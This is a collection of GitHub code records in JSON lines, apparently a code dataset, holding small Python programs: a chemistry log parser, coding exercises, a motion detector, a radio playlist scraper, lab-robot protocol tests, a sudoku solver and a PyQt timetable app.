os.path.exists(fn_param_rrm):\n ## get the infile information\n param_dat=parser_grrm_param(fn_param_rrm)\n param_jobtype=param_dat[\"jobtype\"]\n param_infile=param_dat[\"infile\"]\n if param_jobtype==\"repath\" and param_infile!=\"none\":\n\n dn_infile=fname[:-(len(fname.split(\"/\")[-1])+1)]\n\n fn_abs_infile_top=\"%s/%s\" % (dn_infile, param_infile)\n\n ## Load pt path from the previous job\n out_list=parser_grrm_dat(fn_abs_infile_top)\n \n \n return out_list\n\n \ndef _load_dat_file(fn_abs_dat, count_id):\n\n ls_dat=[]\n\n fdat = open(fn_abs_dat, 'r')\n ieq_cout=-1\n tag_first_eq=0\n line = True\n while line:\n\n line = fdat.readline()\n \n #RESULTS\n #CURRENT COORDINATE\n #H -1.696741879408 -0.381991249860 -0.776848274818\n #B 0.778532341016 -0.368262935046 -0.940077243633\n #C -0.644739894670 -0.303723056303 -0.550973655507\n #P 0.316401529176 0.133374525555 0.871271043561\n #ENERGY = -404.733252292855 0.000000000000 0.000000000000\n # = 0.000000000000 0.000000000000 0.000000000000\n #S**2 = 0.756508849780\n #GRADIENT\n # 0.003235547110\n # 0.000410425111\n # -0.001175093180\n # 0.015696975400\n # -0.006641569140\n # -0.026453248300\n # -0.026122430400\n # -0.006014107450\n # -0.013792948200\n # 0.007189907880\n # 0.012245251500\n # 0.041421289600\n #DIPOLE = -0.422221604000 0.027694074600 0.118443339000\n\n if \"CURRENT COORDINATE\" in line:\n ## put the last dat into json:\n t_json={}\n t_xyz=[]\n while line:\n line = fdat.readline()\n \n if \"ENERGY\" in line:\n break\n else:\n t_d=line.split()\n t_w=[]\n t_w.append(float(t_d[1])*unit_ang2au())\n t_w.append(float(t_d[2])*unit_ang2au())\n t_w.append(float(t_d[3])*unit_ang2au())\n t_xyz.append(t_w)\n\n ## Load Energy\n t_ene=[]\n t_ene.append(float(line.split()[2]))\n t_ene.append(float(line.split()[3]))\n t_ene.append(float(line.split()[4]))\n line = fdat.readline()\n t_ene.append(float(line.split()[1]))\n t_ene.append(float(line.split()[2]))\n \n ## Load S^2 value\n line = fdat.readline() #S**2 = 0.756508849780\n t_s2v=float(line.split()[2])\n \n ## Load Gradient\n natoms=len(t_xyz)\n line = fdat.readline() #GRADIENT\n t_grad=[]\n for iatom in range(0, natoms):\n work=[]\n for idim in range(0,3):\n line = fdat.readline()\n work.append(float(line))\n t_grad.append(work)\n\n ## Load DIPOLE\n line = fdat.readline() #DIPOLE = -0.422221604000 0.027694074600 0.118443339000\n t_dipol=[]\n t_dipol.append(float(line.split()[2]))\n t_dipol.append(float(line.split()[3]))\n t_dipol.append(float(line.split()[4]))\n \n ## save into the lib\n t_json[\"category\"]=\"DAT\"\n t_json[\"symmetry\"]=\"\"\n t_json[\"num\"]=count_id\n t_json[\"xyz\"]=copy.deepcopy(t_xyz)\n t_json[\"energy\"]=copy.deepcopy(t_ene)\n t_json[\"gradient\"]=copy.deepcopy(t_grad)\n t_json[\"s2_value\"]=t_s2v\n t_json[\"dipole\"]=copy.deepcopy(t_dipol)\n t_json[\"atomname\"]=[]\n t_json[\"hess_eigenvalue_au\"]=[]\n ieq_cout=ieq_cout+1\n t_json[\"comment\"]=\"NODE%d\" % (ieq_cout)\n\n ## add to list and count up\n count_id=count_id+1\n ls_dat.append(t_json)\n fdat.close() \n\n return ls_dat, count_id\n\n","repo_name":"scan-team/grrmlog_parser","sub_path":"grrmlog_parser/parser_grrm_dat.py","file_name":"parser_grrm_dat.py","file_ext":"py","file_size_in_byte":5114,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"13015679360","text":"#Group Members\n#1.Troy Liam Jarata\n#2.Marc Janel Quita\n#Joanna Marie Biason\n#October 13,2018\n#1BSIT-01\n#Display the message in one line\n#We display this message in one line\ncontainer = []\nprint(\"Input Number\")\nfor x in range(10):\n lagay=int(input(\"\"))\n container.append(lagay)\na=container.count(max(container))\nprint(\"Occurence of the biggest number: \",a)\nb=str(a)\nc=str(container)\nd=max(container)\ne=str(d)\nf=open(\"MP 34.txt\",'w')\nf.write(\"==================================================================\\n\")\nf.write(\"NUMBERS INPUTED: \\n\")\nfor future in range(len(container)):\n f.write(str(container[future]))\n f.write(\"\\n\")\nf.write((\"Occurence of the biggest number: \"))\nf.write(str(b))\nf.write(\"\\n==================================================================\")\nf=open(\"MP 34.txt\",'r')\nf.close\nprint(\"Successfully Done\")\n","repo_name":"Riuseigi/MP-Finals","sub_path":"MP 34x.py","file_name":"MP 34x.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19925398877","text":"'''\n\n给定一个仅包含数字 2-9 的字符串,返回所有它能表示的字母组合。\n\n给出数字到字母的映射如下(与电话按键相同)。注意 1 不对应任何字母。\n\n\n\n示例:\n\n输入:\"23\"\n输出:[\"ad\", \"ae\", \"af\", \"bd\", \"be\", \"bf\", \"cd\", \"ce\", \"cf\"].\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/letter-combinations-of-a-phone-number\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\n\nclass Solution:\n def letterCombinations(self, digits: str) -> List[str]:\n\n dic = {'1':'!@#','2':'abc','3':'def','4':'ghi','5':'jkl','6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n\n if len(digits) == 0:\n return []\n\n oris = []\n\n for s in digits:\n oris.append(dic[s])\n\n res = [s0 for s0 in oris[0]]\n for i in range(1, len(digits)):\n res = [s0+s1 for s0 in res for s1 in oris[i]]\n\n return res\n\n'''\n\ndigits = '234'\n\ndic = {'1':'!@#','2':'abc','3':'def','4':'ghi','5':'jkl','6':'mno','7':'pqrs','8':'tuv','9':'wxyz'}\n\nif len(digits) == 0:\n print('')\n\noris = []\n\nfor s in digits:\n oris.append(dic[s])\n\nres = [s0 for s0 in oris[0]]\nfor i in range(1, len(digits)):\n res = [s0+s1 for s0 in res for s1 in oris[i]]\n\n\n\n# res = []\n#\n# for s in oris[0]:\n# res.append(s)\n#\n# for s0 in res:\n# for s1 in\n#\n# for i in range(len(oris)-1):\n# for s0 in oris[i]:\n# for s1 in oris[i+1]:\n# res.append(s0+s1)\n#\n","repo_name":"zampie/learning","sub_path":"leetcode/17.py","file_name":"17.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5870875176","text":"import random\nimport tqdm\nimport os\n\ndef outfile(file,outstring):\n with open(file, 'a+') as f:\n f.write(outstring + \"\\n\")\ndef delfile(file):\n if os.path.exists(file):\n os.remove(file)\n\ndelfile(\"data/ml1m/nfm_valid_1m_ratings.dat\")\ndelfile(\"data/ml1m/nfm_test_1m_ratings.dat\")\nwith open(\"data/ml1m/test_1m_ratings.dat\",\"r\") as fin:\n for line in tqdm.tqdm(fin):\n line = line.strip()\n i = random.randint(1,2)\n if i == 1:\n outfile(\"data/ml1m/nfm_valid_1m_ratings.dat\", line)\n else:\n outfile(\"data/ml1m/nfm_test_1m_ratings.dat\", line)\n #pass","repo_name":"wangzhen21/DeepRec","sub_path":"split_to_valid_test.py","file_name":"split_to_valid_test.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"33439999137","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nimport argparse\nimport time\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-c', '--color', type=str, default='gray',\n help='Color space: \"gray\" (default), \"rgb\"')\nparser.add_argument('-b', '--bins', type=int, default=256,\n help='Number of bins per channel (default 256)')\nparser.add_argument('-s', '--sim', type=float, default=0.995,\n help='Similarity of histograms (default 0.995)')\nargs = vars(parser.parse_args())\n\ncolor = args['color']\nbins = args['bins']\nsim = args['sim']\n\nfig, ax = plt.subplots()\nif color == 'rgb':\n ax.set_title('Histograma RGB')\nelse:\n ax.set_title('Histograma escala de cinza')\nax.set_xlabel('Bins')\nax.set_ylabel('Frequency (N of Pixels)')\n\nlw = 3\nalpha = 0.5\nif color == 'rgb':\n lineR, = ax.plot(np.arange(bins), np.zeros((bins,)), c='r', lw=lw, alpha=alpha, label='Red')\n lineG, = ax.plot(np.arange(bins), np.zeros((bins,)), c='g', lw=lw, alpha=alpha, label='Green')\n lineB, = ax.plot(np.arange(bins), np.zeros((bins,)), c='b', lw=lw, alpha=alpha, label='Blue')\n\n canal_referenceR = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceR = cv2.calcHist([canal_referenceR], [0], None, [bins], [0, 255])\n\n canal_referenceG = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceG = cv2.calcHist([canal_referenceG], [0], None, [bins], [0, 255])\n\n canal_referenceB = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceB = cv2.calcHist([canal_referenceB], [0], None, [bins], [0, 255])\n\nelse:\n lineGray, = ax.plot(np.arange(bins), np.zeros((bins,1)), c='k', lw=lw, label='intensity')\n\n image_referenceGRAY = np.zeros((480, 640), dtype=\"uint8\")\n histogram_referenceGRAY = cv2.calcHist([image_referenceGRAY], [0], None, [bins], [0, 255])\n\nax.set_xlim(0, bins)\nax.set_ylim(0, bins + 50)\nax.legend()\nplt.ion()\nplt.show()\n\ncapture = cv2.VideoCapture(0)\nwhile True:\n existe_frame, frame = capture.read()\n frame = cv2.flip(frame, 0)\n\n if not existe_frame:\n break\n\n if color == 'rgb':\n cv2.imshow('RGB', frame)\n (b, g, r) = cv2.split(frame)\n histogramR = cv2.calcHist([r], [0], None, [bins], [0, 255])\n histogramG = cv2.calcHist([g], [0], None, [bins], [0, 255])\n histogramB = cv2.calcHist([b], [0], None, [bins], [0, 255])\n\n cv2.normalize(histogramR, histogramR, 0, 255, cv2.NORM_MINMAX)\n cv2.normalize(histogramG, histogramG, 0, 255, cv2.NORM_MINMAX)\n cv2.normalize(histogramB, histogramB, 0, 255, cv2.NORM_MINMAX)\n\n lineR.set_ydata(histogramR)\n lineG.set_ydata(histogramG)\n lineB.set_ydata(histogramB)\n\n similarityR = cv2.compareHist(histogram_referenceR, histogramR, cv2.HISTCMP_CORREL)\n similarityG = cv2.compareHist(histogram_referenceG, histogramG, cv2.HISTCMP_CORREL)\n similarityB = cv2.compareHist(histogram_referenceB, histogramB, cv2.HISTCMP_CORREL)\n\n similarity = (similarityR + similarityG + similarityB) / 3\n print(similarity)\n\n if (similarityR < sim) or (similarityG < sim) or (similarityB < sim):\n print(\"[INFO] ALARME: movimento detectado \" + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n histogram_referenceR = histogramR.copy()\n histogram_referenceG = histogramG.copy()\n histogram_referenceB = histogramB.copy()\n\n else:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n cv2.imshow('Grayscale', gray)\n histogramGRAY = cv2.calcHist([gray], [0], None, [bins], [0, 255])\n\n cv2.normalize(histogramGRAY, histogramGRAY, 0, 255, cv2.NORM_MINMAX)\n\n lineGray.set_ydata(histogramGRAY)\n\n similarityGRAY = cv2.compareHist(histogram_referenceGRAY, histogramGRAY, cv2.HISTCMP_CORREL)\n\n print(similarityGRAY)\n\n if similarityGRAY < sim:\n print(\"[INFO] ALARME: movimento detectado \" + datetime.now().strftime('%Y-%m-%d %H:%M:%S'))\n\n histogram_referenceGRAY = histogramGRAY.copy()\n\n fig.canvas.draw()\n fig.canvas.flush_events()\n time.sleep(0.1)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncapture.release()\ncv2.destroyAllWindows()\n","repo_name":"matiasucker/image-processing","sub_path":"histogramas/motion_detector.py","file_name":"motion_detector.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26871718625","text":"from typing import List, Dict\n\nclass Scanner(object):\n\tdef __init__(self, depth: int, width: int, pos: int = 0, dir = 1) -> None:\n\t\tself.depth = depth\n\t\tself.width = width\n\t\tself.pos = pos\n\t\tself.dir = 1\n\n\tdef update(self):\n\t\tpos = (self.pos + 1) % self.width\n\t\treturn Scanner(self.depth, self.width, pos)\n\n\tdef __repr__(self) -> str:\n\t\tblocks = ['[ ]'] * self.width\n\t\tblocks[self.pos] = '[S]'\n\t\tblocks = ' '.join(blocks)\n\t\treturn blocks\n\ndef update(scanner: Scanner) -> Scanner:\n\tscanner.pos += scanner.dir\n\tif scanner.pos == scanner.width or scanner.pos == -1:\n\t\tscanner.dir *= -1\n\t\tscanner.pos += scanner.dir\n\treturn Scanner(scanner.depth, scanner.width, scanner.pos, scanner.dir)\n\ndef parse_scanners(string: str) -> Dict[int, Scanner]:\n\tscanners: Dict[int, Scanner] = {}\n\tfor line in string.split('\\n'):\n\t\tdepth, width = line.split(': ')\n\t\tdepth, width = int(depth), int(width)\n\t\tscanners[depth] = Scanner(depth, width)\n\treturn scanners\n\ndef update_scanners(scanners: Dict[int, Scanner]) -> Dict[int, Scanner]:\n\treturn {layer : update(scanners[layer]) for layer in scanners}\n\ndef severity(scanners: Dict[int, Scanner]) -> int:\n\tnum_layers = max(scanners)\n\ttotal_severity = 0\n\tfor i in range(num_layers):\n\t\tprint(scanners)\n\t\tif i in scanners:\n\t\t\tif scanners[i].pos == 0:\n\t\t\t\tprint('found!')\n\t\t\t\ttotal_severity += i * scanners[i].width\n\t\t\tprint(i, scanners[i].width, total_severity)\n\t\tscanners = update_scanners(scanners)\n\treturn total_severity\n\ndef rep_scanners(scanners: List[Scanner]) -> str:\n\treprs = [scanner.__repr__() for scanner in scanners]\n\treturn '\\n'.join(reprs)\n\n\n\n\nTEST_INPUT = \"\"\"0: 3\n1: 2\n4: 4\n6: 4\"\"\"\n\ntest_scanners = parse_scanners(TEST_INPUT)\nprint(severity(test_scanners))\n# print(test_scanners)\n# print(update_scanners(test_scanners))\n# print(rep_scanners(test_scanners))\n# print()\n\n# for i in range(5):\n# \ttest_scanners = update_scanners(test_scanners)\n# \tprint(rep_scanners(test_scanners))\n# \tprint()\n","repo_name":"seeM/advent-of-code-2017","sub_path":"day13/firewall.py","file_name":"firewall.py","file_ext":"py","file_size_in_byte":1926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"39775947307","text":"# --------------------------------------------------------------------\n\nfrom cgi import escape\n\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\n# --------------------------------------------------------------------\n\nclass MainPage(webapp.RequestHandler):\n def get(self):\n # Write the submission form\n out = self.response.out\n out.write('')\n out.write('
\\n')\n out.write(\"\"\"\n

KAIST CS101

\n
What is your name?
\n
What is your favorite number?
\n
\n
\"\"\")\n \nclass Result(webapp.RequestHandler):\n def post(self):\n out = self.response.out\n name = self.request.get('name')\n nums = self.request.get('number')\n num = int(nums)\n sqnum = num ** 2\n out.write('')\n out.write('

Hello %s,

' % name)\n out.write(\"

Your lucky square is %d.

\" % sqnum)\n out.write('\\n')\n \n# --------------------------------------------------------------------\n\napplication = webapp.WSGIApplication([('/', MainPage),\n ('/result', Result)],\n debug=True)\n\ndef main():\n run_wsgi_app(application)\n\nif __name__ == \"__main__\":\n main()\n\n# --------------------------------------------------------------------\n","repo_name":"otfried/cs101","sub_path":"code/kaist-cs101/cs101.py","file_name":"cs101.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"52"} +{"seq_id":"39446368332","text":"'''\nCreated on 16 2010\n\n@author: ivan\n'''\nimport urllib2\nimport logging\nsite = \"http://myradio.ua/\"\n\n\ndef load_urls_name_page():\n connect = urllib2.urlopen(site)\n data = connect.read() \n result = {} \n file = open(\"MYRADIO_UA.fpl\", \"w\")\n for line in data.split(\"\\n\"):\n line = line.decode(\"cp1251\")\n pre = \"\", start + 10)\n if start > 0 and end > 0: \n url = line[line.find(\"\", start)].replace('\"', '')\n name = line[line.find(\">\", start) + 1:line.find(\"\")]\n result[url.strip()] = name\n \n \n urls = get_radio_ulr(url.strip()).split(\",\")\n line = name.strip() + \" = \" + urls[1] + \", \" + urls[0]\n file.write(line + \"\\n\");\n logging.info(line)\n \n if url.strip() == \"chanel/eurovision\":\n file.close()\n return result\n \n\ndef get_radio_ulr(chanel):\n connect = urllib2.urlopen(site + chanel)\n data = connect.read()\n result = \"\" \n for line in data.rsplit(\"\\n\"):\n \"\"\"\"\"\"\n if line.find(' 0 and line.find('.m3u') and line.find(\"window\") < 0 :\n pre = '
= 2010 and self.arr[0] <= 2020 and self.arr[1] >= 6000 and self.arr[1] <= 17000:\n insurance = self.arr[1] * 5/100\n else:\n insurance = self.arr[1] * 7/100\n\n print(\"The insurance is %s\" %insurance)\n return insurance\n\n\n def car_data(self):\n print(\"The car model is %s, the year is %s, the price is %s\" %(self.arr[2], self.arr[0], self.arr[1]))\n\n\n def door_status(self):\n if self.arr[3] == True:\n print(\"The doors are closed\")\n else:\n print(\"The doors are not closed\")\n\n\n\nford_focus = Car([2005, 2000, \"ford_focus\", True])\naudi_a3 = Car([2011, 15000, \"audi_a3\", False ])\n\nford_focus.car_data()\nford_focus.insurance_price()\nford_focus.door_status()\nprint(\"\\n\")\naudi_a3.car_data()\naudi_a3.insurance_price()\naudi_a3.door_status()","repo_name":"Raycho01/Basic-Python-Programs","sub_path":"project_8.py","file_name":"project_8.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41931336531","text":"import unittest\nfrom opentrons_sdk.protocol import Protocol\n\n\nclass ProtocolTest(unittest.TestCase):\n\n def setUp(self):\n self.protocol = Protocol()\n\n @property\n def instructions(self):\n return self.protocol._commands\n\n def test_normalize_address(self):\n self.protocol.add_container('A1', 'microplate.96', label=\"Output\")\n label = self.protocol._normalize_address('Output:A1')\n self.assertEqual(label, ('output', (0, 0)))\n slot = self.protocol._normalize_address('A1:A1')\n self.assertEqual(slot, ((0, 0), (0, 0)))\n\n def test_transfer(self):\n \"\"\" Basic transfer. \"\"\"\n self.protocol.add_container('A1', 'microplate.96')\n self.protocol.add_container('B1', 'microplate.96')\n self.protocol.add_instrument('A', 'p200')\n self.protocol.add_instrument('B', 'p20')\n self.protocol.transfer('A1:A1', 'B1:B1', ul=100, tool='p20')\n expected = [{\n 'transfer': {\n 'tool': 'p20',\n 'volume': 100,\n 'start': ((0, 0), (0, 0)),\n 'end': ((1, 0), (1, 0)),\n 'blowout': True,\n 'touchtip': True\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_transfer_group(self):\n \"\"\" Transfer group. \"\"\"\n expected = [{\n 'transfer_group': {\n 'tool': 'p10',\n 'transfers': [\n {\n 'volume': 15,\n 'start': ((0, 0), (0, 0)), # A1:A1\n 'end': ((1, 0), (1, 0)), # B1:B1\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 1000,\n 'start': ((0, 1), (0, 1)), # A2:A2\n 'end': ((1, 1), (1, 1)), # B2:B2\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ((0, 2), (0, 2)), # A3:A3\n 'end': ((1, 2), (1, 2)), # B3:B3\n 'blowout': False,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ((0, 3), (0, 3)), # A4:A4\n 'end': ((1, 3), (1, 3)), # B4:B4\n 'blowout': True,\n 'touchtip': True\n },\n {\n 'volume': 12,\n 'start': ('label', (0, 4)), # label:A5\n 'end': ((1, 4), (2, 0)), # B5:C1\n 'blowout': True,\n 'touchtip': True\n }\n ]\n }\n }]\n self.protocol.add_container('A1', 'microplate.96', label=\"Label\")\n self.protocol.transfer_group(\n ('A1:A1', 'B1:B1', {'ul': 15}),\n ('A2:A2', 'B2:B2', {'ml': 1}),\n ('A3:A3', 'B3:B3', {'blowout': False}),\n ('A4:A4', 'B4:B4'),\n ('Label:A5', 'B5:C1'),\n ul=12,\n tool='p10'\n )\n self.assertEqual(self.instructions, expected)\n\n def test_distribute(self):\n self.protocol.distribute(\n 'A1:A1',\n ('B1:B1', 50),\n ('C1:C1', 5),\n ('D1:D1', 10)\n )\n expected = [{\n 'distribute': {\n 'tool': 'p10',\n 'blowout': True,\n 'start': ((0, 0), (0, 0)),\n 'transfers': [\n {\n 'volume': 50,\n 'end': ((1, 0), (1, 0)), # B1:B1\n },\n {\n 'volume': 5,\n 'end': ((2, 0), (2, 0)), # C1:C1\n },\n {\n 'volume': 10,\n 'end': ((3, 0), (3, 0)) # D1:D1\n }\n ]\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_consolidate(self):\n \"\"\" Consolidate. \"\"\"\n self.protocol.consolidate(\n 'A1:A1',\n ('B1:B1', 50),\n ('C1:C1', 5),\n ('D1:D1', 10)\n )\n expected = [{\n 'consolidate': {\n 'tool': 'p10',\n 'blowout': True,\n 'end': ((0, 0), (0, 0)),\n 'transfers': [\n {\n 'volume': 50,\n 'start': ((1, 0), (1, 0)), # B1:B1\n },\n {\n 'volume': 5,\n 'start': ((2, 0), (2, 0)), # C1:C1\n },\n {\n 'volume': 10,\n 'start': ((3, 0), (3, 0)) # D1:D1\n }\n ]\n }\n }]\n self.assertEqual(self.instructions, expected)\n\n def test_mix(self):\n \"\"\" Mix. \"\"\"\n self.protocol.mix(\n 'A1:A1',\n volume=50,\n repetitions=10\n )\n expected = [{'mix': {\n 'tool': 'p10',\n 'start': ((0, 0), (0, 0)), # A1:A1\n 'blowout': True,\n 'volume': 50,\n 'reps': 10\n }}]\n self.assertEqual(self.instructions, expected)\n\n def test_protocol_run_twice(self):\n \"\"\" Run a protocol twice without error. \"\"\"\n self.protocol.add_instrument('A', 'p200')\n self.protocol.add_container('C1', 'tiprack.p200')\n self.protocol.add_container('A1', 'microplate.96')\n self.protocol.calibrate('A1', x=1, y=2, z=3)\n self.protocol.calibrate_instrument('A', top=0, blowout=10)\n self.protocol.transfer('A1:A1', 'A1:A2', ul=100)\n self.protocol.transfer('A1:A2', 'A1:A3', ul=80)\n self.protocol.run_all()\n self.protocol.run_all()\n","repo_name":"Yuffster/opentrons_sdk","sub_path":"tests/opentrons_sdk/protocol/test_protocol.py","file_name":"test_protocol.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"37176906970","text":"from logic.Cell import Cell\n\nimport math\n\n\nclass Grid:\n def __init__(self, grid_size):\n # Initialize empty sudoku 9x9 grid\n self.grid_size = grid_size\n self.cell_cnt = grid_size ** 2\n self.fixed_cell_cnt = 0\n self.failed_cell_cnt = 0\n self.grid = [[Cell(self.grid_size) for _ in range(self.grid_size)] for _ in range(self.grid_size)]\n\n def get_cell(self, pos):\n return self.grid[pos[0]][pos[1]]\n\n def set_cell_val(self, pos, val):\n cell = self.get_cell(pos)\n\n if not cell.failed():\n if not cell.fixed():\n self.fixed_cell_cnt += 1\n\n cell.set_val(val)\n\n def all_cells_fixed(self):\n return self.fixed_cell_cnt == self.cell_cnt\n\n def not_solvable(self):\n return self.failed_cell_cnt > 0\n\n def propagate_constraints_row(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n for col in range(self.grid_size):\n if cell_to_reduce.failed():\n return\n\n if col is not pos[1]:\n cell_coo = (pos[0], col)\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n def propagate_constraints_col(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n for row in range(self.grid_size):\n if cell_to_reduce.failed():\n return\n\n if row is not pos[0]:\n cell_coo = (row, pos[1])\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n def propagate_constraints_square(self, pos):\n cell_to_reduce = self.get_cell(pos)\n\n square_size = int(math.sqrt(self.grid_size))\n square_start_row = pos[0] // square_size * square_size\n square_start_col = pos[1] // square_size * square_size\n\n for row in range(square_start_row, square_start_row + square_size):\n for col in range(square_start_col, square_start_col + square_size):\n if cell_to_reduce.failed():\n return\n\n if row != pos[0] or col != pos[1]:\n cell_coo = (row, col)\n cell = self.get_cell(cell_coo)\n\n if not cell.failed():\n if cell.fixed():\n cell.delete(cell_to_reduce.get_val())\n\n if cell.failed():\n self.failed_cell_cnt += 1\n self.fixed_cell_cnt -= 1\n\n else:\n cell.delete(cell_to_reduce.get_val())\n\n if cell.fixed():\n self.fixed_cell_cnt += 1\n self.propagate_constraints_cell(cell_coo)\n\n # Propagate constraints after setting cell\n def propagate_constraints_cell(self, pos):\n self.propagate_constraints_row(pos)\n self.propagate_constraints_col(pos)\n self.propagate_constraints_square(pos)\n\n def propagate_constraints_all_cells(self):\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if cell.fixed() and not cell.failed():\n self.propagate_constraints_cell((row, col))\n\n def deduce_val_row(self, pos, val):\n for col in range(self.grid_size):\n if col != pos[1]:\n cell = self.get_cell((pos[0], col))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_col(self, pos, val):\n for row in range(self.grid_size):\n if row != pos[0]:\n cell = self.get_cell((row, pos[1]))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_square(self, pos, val):\n square_size = int(math.sqrt(self.grid_size))\n square_start_row = pos[0] // square_size * square_size\n square_start_col = pos[1] // square_size * square_size\n\n for row in range(square_start_row, square_start_row + square_size):\n for col in range(square_start_col, square_start_col + square_size):\n if row != pos[0] or col != pos[1]:\n cell = self.get_cell((row, col))\n\n if cell.can_contain(val):\n return False\n\n return True\n\n def deduce_val_cell(self, pos):\n cell = self.get_cell(pos)\n\n for val in cell.possible_vals:\n if self.deduce_val_row(pos, val) or self.deduce_val_col(pos, val) or self.deduce_val_square(pos, val):\n self.set_cell_val(pos, val)\n self.propagate_constraints_cell(pos)\n return\n\n def deduce_vals_all_cells(self):\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if not cell.fixed() and not cell.failed():\n self.deduce_val_cell((row, col))\n\n # Read sudoku grid\n def read_grid(self, sudoku_file):\n input_grid = open(sudoku_file, \"r\")\n\n for row, vals in enumerate(input_grid.readlines()):\n if len(vals) - 1 != self.grid_size:\n input_grid.close()\n return False\n\n for col in range(self.grid_size):\n val = vals[col]\n\n # Not valid sudoku value\n if not (vals[col] == '-' or (val.isdigit() and 1 <= int(val) <= self.grid_size)):\n input_grid.close()\n return False\n\n if val != '-':\n self.set_cell_val((row, col), int(val))\n\n input_grid.close()\n return True\n\n def print(self):\n for row in range(self.grid_size):\n if row % math.sqrt(self.grid_size) == 0:\n print(\"-------------------------\")\n\n for col in range(self.grid_size):\n if col % math.sqrt(self.grid_size) == 0:\n print(\"|\", end=\" \")\n\n val = self.grid[row][col]\n\n if val.fixed():\n print(val.get_val(), end=\" \")\n else:\n print(\"-\", end=\" \")\n\n print(\"|\")\n\n print(\"-------------------------\")\n\n def is_valid(self):\n self.propagate_constraints_all_cells()\n\n for row in range(self.grid_size):\n for col in range(self.grid_size):\n cell = self.get_cell((row, col))\n\n if not cell.fixed():\n return False\n\n return True\n","repo_name":"klesnkri/sudoku-solver-aco","sub_path":"sudoku/src/logic/Grid.py","file_name":"Grid.py","file_ext":"py","file_size_in_byte":7631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"44894151038","text":"import timetable_parser as tp\nimport sys\nimport datetime\nimport threading\nimport os\nimport configparser\n\n# from PyQt5 import QtGui, QtCore, QtWidgets\n# import qt5_layout as qt_layout\n\nfrom PyQt4 import QtGui, QtCore\nfrom PyQt4 import QtGui as QtWidgets\nimport qt_layout\n\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath('.')\n return os.path.join(base_path, relative_path)\n\nwith open(resource_path(\"style.qss\"), 'r') as f:\n style = f.read()\n\n\nclass TimetableApp(QtWidgets.QMainWindow, qt_layout.Ui_MainWindow):\n def __init__(self, parent=None):\n super(TimetableApp, self).__init__(parent)\n self.setupUi(self)\n self.date_edit_list = [self.term_start_edit, self.half_end_edit, self.half_start_edit, self.term_end_edit]\n for index in range(len(self.date_edit_list)):\n date_edit = self.date_edit_list[index]\n date_edit.setDate(QtCore.QDate.currentDate())\n date_edit.calendarWidget().setFirstDayOfWeek(1)\n date_edit.dateChanged.connect(self.lambdaGen(index))\n cal = QStyledCalendar()\n cal.setMinimumHeight(200)\n cal.setFirstDayOfWeek(1)\n cal.setDayColor(6, \"gray\")\n cal.setDayColor(7, \"gray\")\n cal.setDirectionIcons(resource_path(\"icons/left-arrow.png\"), resource_path(\"icons/right-arrow.png\"))\n cal.setVerticalHeaderFormat(QtWidgets.QCalendarWidget.NoVerticalHeader)\n date_edit.setCalendarWidget(cal)\n if index > 0:\n date_edit.setMinimumDate(QtCore.QDate.currentDate())\n\n self.xml_choice_button.clicked.connect(self.selectXMLFile)\n 